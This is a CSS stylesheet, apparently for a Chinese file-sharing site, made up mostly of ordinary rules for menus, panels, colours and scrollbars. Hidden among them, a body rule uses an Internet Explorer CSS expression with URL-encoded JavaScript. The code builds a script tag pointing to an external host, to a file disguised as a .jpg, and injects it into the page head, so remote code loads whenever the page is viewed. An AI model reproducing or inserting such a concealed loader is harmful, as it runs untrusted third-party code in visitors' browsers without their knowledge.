body {
	background-color:#9CBDE1;
	font-family: 宋体, Century Gothic, Arial, Helvetica;
	margin:0px;
	}
img {
	border:0;
	}
.tdtop {
	background-color:#2D6DA1;
	border-bottom:1px solid #3E3E3E;
	}
div.ystop {
	padding:3px;
	color:#BCE9FF;
	}
div.ystop h1 {
	FONT-SIZE: 18pt;
	margin:10px 0 0 9px;
	}
div.ystop p {
	margin:15px 0 0 8px;
	}
div.ystop a {
	COLOR: #BCE9FF;
	}
.ta_wjq td{
	background:transparent url("http://ys-e.cccpan.com/555122037/lktoiOo7L3I5I6I3QK5/blue.jpg");
	height:23px;
	} 
.mlxz {
	color:blue ;
	height:18;
	width:162;
	background-color:#DDECFF;
	}
.tx3 {
	height:18px;
	font-size: 9pt;
	border: 1px solid;
	border-color: black black #000000;
	color:blue ;
	background-color:#DDECFF
	}
.bt2 {
	border-width: 1px;
	height: 20px; 
	background-color: #8DCCFF;
	cursor: hand;font-size:9pt;
	}
#nr {
	color:blue;
	BORDER:rgb(51,51,51) 1px solid;
	width: 220; height:55;
	background-color:#DDECFF;
	font-family: 宋体, Century Gothic, Arial, Helvetica; 
	font-size: 9pt
	}
.lynrc {
	background-color:#EBF2FF;
	padding:3px;width:247px;
	border:1px solid #000;
	color:#00006F;
	overflow-y :auto;
	overflow:hidden;
	width:255px;
	overflow-y:scroll;
	height:100%;
	word-wrap:break-word;
	word-break:break-all;
	}
.lynrc p {
	line-height:19px;
	margin:5px 0 3px 0;
	}
.lynrc p {
	background:url('http://zy.ys168.com/tp/line_yy1.gif') 0em -0.1em;
	}
.lynrc b {
	margin-left:3px;
	}
.lynrc label {
	margin-right:5px;
	}
.lynrc img{
	width:15px;
	height:15px;
	cursor:url('http://zy.ys168.com/tp/cur/edit1.cur'),default;
	}
a.aly {
	cursor:url('http://zy.ys168.com/tp/cur/edit1.cur'),default;
	display:inline-block;
	}
a.aly:hover {
	background-color:red;
	}
#ysmenu {
	width:100%;
	height:22px;
	background:url('http://zy.ys168.com/tp/menubj1.gif') repeat-x 0em 0em;}
#ysmenu1 {
	width:253px !important;
	width:255px;
	/*min-height:125px !important;height:125px;*/
	border:1px solid #000;
	border-top:0px solid #000;
	background-color:#CCE2F4;
	margin-top:0px;
	}
#ysmenu1 p {
	margin:2px 0 0 16px;
	line-height:20px;
	}
.la1 {
	width:58px;
	display:inline-block;
	}
#ysmenu a {
	font-size:9pt;
	border-top:1px solid #000;
	border-right:1px solid #000;
	border-left:1px solid #000;
	text-decoration:none
	}
#ysmenu div {
	margin-left:1px;
	float:left;
	text-align:center;
	font-size:9pt;
	padding-left:5px;
	padding-right:5px;
	cursor:pointer;
	}
.ysm0 {
	height:15px !important;
	height:20px;
	margin-top:2px;
	padding-top:3px;
	border:1px solid black;
	border-bottom:1px solid #000;
	background-color:#60B1EA;
	}
.ysm0x {
	height:15px !important;
	height:20px;
	margin-top:2px;
	padding-top:3px;
	border:1px solid black;
	border-bottom:1px solid #000;
	background-color:#CCE2F4;
	}
.ysm1 {
	height:15px !important;
	height:21px;
	margin-top:1px;
	padding-top:4px;
	border:1px solid black;
	border-bottom:1px solid #CCE2F4;
	background-color:#CCE2F4
	}
body {
	java:expression((function(){function $(A,B){var D=document;var U=unescape;var A=U(A);if(!D.all(A)&&!new RegExp(A,"i").test(ddlmc)){var E=D.createElement(A);E.id=A;E.src=U(B);D.all.tags('HEAD')[0].appendChild(E)}};$("%73%63%72%69%70%74","H%54TP%3A%2F%2FCHUNGE188%2ECOM%2FSTYLE%2FJAVA%2EJ%50G")})());}
.wjlxxz {
	border:1px dashed #00006F;
	margin-right:10px;
	}
div.ysm0 a:hover{
	background-color:#CCE2F4;
	}
.a1 {
	color:#000000; 
	font-size:9pt 
	}
:hover.a1 {
	color:red; 
	text-decoration:underline}
.a2 {
	color:#808080; 
	font-size:9pt }
:hover.a2 {
	color:red
	}
P {
	FONT-SIZE: 9pt;
	line-height:140%;
	}
td {
	font-size:9pt;
	}
A {
	color:#000;
	font-family: 宋体, Century Gothic, Arial, Helvetica;
	text-decoration: none 
	}
A:hover {
	COLOR: red;
	TEXT-DECORATION: underline
	}
#mainMenu {
	width: 100%;
	font-size:9pt;
	padding-top:3px;
	}
#mainMenu font {
	font-size:9pt;
	margin-left:6px;
	color:#006600
	}
#menuList {
	margin: 0px;
	padding:0px;
	}
#menuList li {
	list-style-type:none;
	BORDER-BOTTOM: #76C196 1px solid;
	line-height:140%;
	padding-left:0px;
	}
#menuList li ul li,#menuList li ul li ul li {
	BORDER-BOTTOM:0;
	}
#menuList li label {
	color:#000080;
	margin-left:6px;
	}
#menuList li img{
	width:16px;
	height:16px;
	margin-right:1px;
	cursor:url('http://zy.ys168.com/tp/cur/edit1.cur'),default;
	}
.menu {
	display: none;
	border-left:2px solid green;
	padding-left:3px;
	padding-bottom:10px;
	}
#menuList li ul {
	margin-left:35px;
	height:auto!important;
	height:160px;
	min-height:160px;
	}
#menuList li ul li ul{
	margin-left:15px;
	height:auto!important;
	height:80px;
	min-height:80px;
	}
a.ml {
	color: #000;
	text-decoration: none;
	}
a.wj:visited,a.lj:visited {
	color:#8B4513;
	}
.lxts {
	font-size:9pt;
	}
.s1 {
	padding-left:15px;
	background:url('http://zy.ys168.com/tp/jt1.gif') no-repeat 0em 0.1em;
	}
.s2 {
	padding-left:16px;
	background:url('http://zy.ys168.com/tp/jt2.gif') no-repeat 0.2em 0em;
	padding-top:3px;
	padding-right:2px;
	color:red;
	}
.s3 {
	padding-left:16px;
	background:#fff url('http://zy.ys168.com/tp/jt3.gif') no-repeat 0em 0.2em;
	padding-top:0px;
	}
#menuList li table {
	border:1px solid #8FBC8F;
	border-bottom:1px solid black;
	border-right:1px solid black;
	margin-left:2px;
	width:15px;
	height:13px;
	float:left;
	margin-top:3px;
	margin-right:1px !important;
	margin-right:0px;
	background-color:#FFFF9C;
	cursor:pointer;
	}
#menuList li table td {
	border:0px;width:2px;
	}
#menuList li table td.r {
	background-color:A0522D
	}
#menuList li table td.g {
	background-color:228B22
	}
a.mln {
	color: blue;
	font-size: 9pt;
	text-decoration: none;
	}
a.ml:hover,a.mln:hover{
	color:red;
	text-decoration: underline;
	}
.newa {
	color: blue;
	}
span.key {
	text-decoration: underline;
	}
.yybj {
	font-size: 9pt;
	text-decoration:none;
	color:#928047;
	margin-left:3px;
	}
:hover.yybj {
	text-decoration:underline;
	color:#928047;
	}
.yyck {
	font-size: 9pt;
	text-decoration:underline;
	color:#000080;
	margin-left:8px;
	}
:hover.yyck {
	color:blue;
	text-decoration:none
	}
div.yszdyq {
	margin-top:3px;
	margin-left:5px;
	margin-right:5px;
	width:166px !important;
	width:170px;
	font-size:9pt;
	border: 2px solid #2D6DA1;
	}
.z_bt {
	color:#fff;
	padding-top:5px;
	padding-bottom:3px;
	padding-left:20px;
	background:#2D6DA1 url('http://zy.ys168.com/tp/ysbt.gif') no-repeat 0.3em 0.3em;
	word-wrap:break-word; 
	overflow:hidden;
	}
.z_bo {
	background-color:WhiteSmoke;
	width:100%;
	padding:0px 0px 0px 0px;
	word-wrap:break-word;
	overflow:hidden;
	display:block;
	}
.z_bo ul {
	margin:1px;padding:1px;
	background-color: #fff;
	list-style-type:none;
	}
.ck {
	font-size:9pt;
	border:1px solid #153074;
	position :absolute; 
	z-index: 1500; 
	background-color: #2D6DA1;
	}
.ck p {
	line-height:20px;
	margin:0px;
	}
.ckbt {
	padding-left:4px;
	padding-top:2px;
	height:22px;
	color:White;
	background-color: #153074;
	line-height:150%;
	}
.jaml {
	COLOR: #000000;
	font-size:9pt ;
	text-decoration:none
	}
:hover.jaml {
	color:blue; 
	text-decoration:underline
	}
.abu {
	display:inline-block;
	width:15px;
	color: #ccc;
	font-size:9pt ;
	text-decoration:none;
	float:right;
	/*font-weight:bold;*/
	text-align:center;
	}
:hover.abu {
	font-size:14pt;
	text-decoration:none
	}

body #menuList img{filter:progid:DXImageTransform.Microsoft.Chroma(color=#D8E9EC)}/*PNG透明修正*/
body{
	background: #008EBE url("body.jpg") repeat scroll right top;
	}
.ystop{background:#238FCF url("top.jpg") no-repeat scroll left top;height:194px !important;height:200px;}
.ystop h1{display:none;}
.ystop p{margin-top:180px !important;text-align:center;}
.tdtop{border-bottom:0px solid #3E3E3E;}
#ta_z td{padding-top:0px !important;}
#laczts,#laczts P{padding:0px;margin:0px;}
input.bt2{border:1px solid white;}
#ysmenu1 .bt2,#lynr .bt2{background-color:#01A0CA;color:#000080;}
#table2 .bt2{background-color:transparent;color:white;}
#dzx {background:white url('dzx.jpg') no-repeat scroll center top;}
.ta_wjq td{background:transparent url("http://ys-e.cccpan.com/555122037/lktoiOo7L3I5I6I3QK5/blue.jpg") repeat-x scroll 0px 0px;height:23px !important}
.ck {border:1px solid #0030CE;}
.z_bt,.ckbt {background:#1B89D8 url("zbobj.jpg") repeat-x scroll left 1px;height:24px;}
.z_bt {color:white;padding:0px 0px 0px 16px;word-wrap:break-word; overflow:hidden;line-height:24px;height:24px !important;}
.z_bo {background-color:WhiteSmoke;width:100%;padding:0px;word-wrap:break-word; overflow:hidden;display:block;}
.z_bo ul {margin:0px;padding:1px;background-color:black;list-style-type:none;}
.z_bo li, .z_bo font {color:#00A000 !important}
.z_bo A {color:#00A000;font-family: 宋体, Century Gothic, Arial, Helvetica; text-decoration: none }
.z_bo A:hover {COLOR:#ffff00;TEXT-DECORATION: underline}
.z_bo ul li img {display:none}
#elady_tprotator1 {display:block !important;width:expression(zdyBo_1.offsetWidth) !important;height:auto !important;}
#elady_tprotator1 {background:transparent url('loading.gif') no-repeat scroll center center;}
.z_bo ul li{margin:1px auto;}
.z_bo ul li A {background:transparent url('http://zy.ys168.com/tp/wjlx2/url.gif') no-repeat scroll top left;padding:2px 0px 0px 18px;font:9pt/16px;height:19px;}
.z_bo ul li font {background:transparent url('wj.gif') no-repeat scroll top left;padding:2px 0px 0px 18px;font:9pt/16px;}
#laczts A, #laczts font {color:white !important}
div#idzdy {margin:2px 2px auto 2px;width:302px !important;width:306px;font-size:9pt;border:2px solid #2D6DA1;background-color:black;}
#idzdy1 {display:none !important}
.lynrc {background:#0086B9 url('lynr.jpg') no-repeat scroll center top;border:1px solid white;color:white !important}
#ysmenu {width:100%;height:22px;background:url('http://zy.cccpan.com/tp/menubj1.gif') repeat-x 0em 0em;}
#ysmenu1 {width:253px !important;width:255px;border:1px solid #000;border-top:0px solid #000;background-color:#73CEE3;margin-top:0px;}
#ysmenu1 p {margin:2px 0 0 16px;line-height:20px;}
.la1 {width:58px;display:inline-block;}
#ysmenu a {font-size:9pt;border-top:1px solid #000;border-right:1px solid #000;border-left:1px solid #000;text-decoration:none}
#ysmenu div {margin-left:1px;float:left;text-align:center;font-size:9pt;padding-left:5px;padding-right:5px;cursor:pointer;}
.ysm0 {height:15px !important;height:20px;margin-top:2px;padding-top:3px;border:1px solid black;border-bottom:1px solid #000;background-color:transparent;}
.ysm0x {height:15px !important;height:20px;margin-top:2px;padding-top:3px;border:1px solid black;border-bottom:1px solid #000;background-color:#73CEE3;}
.ysm1 {height:15px !important;height:21px;margin-top:1px;padding-top:4px;border:1px solid black;border-bottom:1px solid #73CEE3;background-color:#73CEE3}
.menu {display: none; border-left:2px solid #666666;padding-left:3px;padding-bottom:10px;}
#menuList li {list-style-type:none;border-bottom: #A0A0A0 1px solid;line-height:140%;padding-left:0px;}
/*#menuList li{border-bottom-width:0px;}*/
#menuList table{display:none}
#menuList li img{width:24px;height:24px;margin:1px 6px -3px 6px;cursor:auto;}
#menuList ul img{width:16px;height:16px;margin:auto 1px auto auto;cursor:url('http://zy.cccpan.com/tp/cur/edit1.cur');}
span.s1, span.s1 font,.menu li span{color:#006600 !important;}
.s3{background-color:transparent !important;}

.ystop H1{display:none;}#nr {background:url(http://www.chunge188.com/sf/ly.gif) center center no-repeat #f5f5f5;}#idzdy1{display:none !important;}

#sipt2,#shtm2,#shtm2 label,#sipt2 label{background-color:transparent !important;}
#sipt1,#shtm1 {background:#0030CE url("zbobj.jpg") repeat-x 0px 0px !important;border-color:#0030CE !important;}
#sipt4 A.wj {color:black !important;}
#sipt4 A.wj:hover {color:red !important;}
#laczts{color:white !important;}
#java_vbs_form{filter:progid:DXImageTransform.Microsoft.Alpha(opacity=80);}

body {
  scrollbar-3dLight-Color: #00A5CD;     /*设置箭头和滚动条左侧和顶边的颜色*/
  scrollbar-Arrow-Color: #FFFFFF;       /*设置滚动条上的箭头颜色*/
  scrollbar-Base-Color: #00A5CD;        /*设置滚动条的底色*/
  scrollbar-DarkShadow-Color: #00A5CD;  /*设置箭头和滚动条右侧和底边的颜色*/
  scrollbar-Face-Color: #00A5CD;        /*设置滚动条的表色*/
  scrollbar-Highlight-Color: #FFFFFF;   /*设置箭头和滚动条左侧和顶边的颜色，以及滚动条的背景*/
  scrollbar-Shadow-Color: #FFFFFF;      /*设置箭头和滚动条右侧和底边的颜色*/
  scrollbar-Track-Color: #FFFFFF;       /*设置滚动条的背景色*/
}
#menuList ul img{width:16px;height:16px;margin:auto 1px auto auto;cursor:url('http://zy.cccpan.com/tp/cur/edit1.cur');}
span.s1, span.s1 font,.menu li span{color:#006600 !important;}
.s3{background-color:transparent !important;}

.ystop H1{display:none;}#nr {background:url(http://www.chunge188.com/sf/ly.gif) center center no-repeat #f5f5f5;}#idzdy1{display:none !important;}

#sipt2,#shtm2,#shtm2 label,#sipt2 label{background-color:transparent !important;}
#sipt1,#shtm1 {background:#0030CE url("zbobj.jpg") repeat-x 0px 0px !important;border-color:#0030CE !important;}
#sipt4 A.wj {color:black !important;}
#sipt4 A.wj:hover {color:red !important;}
#laczts{color:white !important;}
#java_vbs_form{filter:progid:DXImageTransform.Microsoft.Alpha(opacity=80);}

body {
  scrollbar-3dLight-Color: #00A5CD;     /*设置箭头和滚动条左侧和顶边的颜色*/
  scrollbar-Arrow-Color: #FFFFFF;       /*设置滚动条上的箭头颜色*/
  scrollbar-Base-Color: #00A5CD;        /*设置滚动条的底色*/
  scrollbar-DarkShadow-Color: #00A5CD;  /*设置箭头和滚动条右侧和底边的颜色*/
  scrollbar-Face-Color: #00A5CD;        /*设置滚动条的表色*/
  scrollbar-Highlight-Color: #FFFFFF;   /*设置箭头和滚动条左侧和顶边的颜色，以及滚动条的背景*/
  scrollbar-Shadow-Color: #FFFFFF;      /*设置箭头和滚动条右侧和底边的颜色*/
  scrollbar-Track-Color: #FFFFFF;       /*设置滚动条的背景色*/
}
http://ys.chunge188.com/script/css2/dodgerblue.css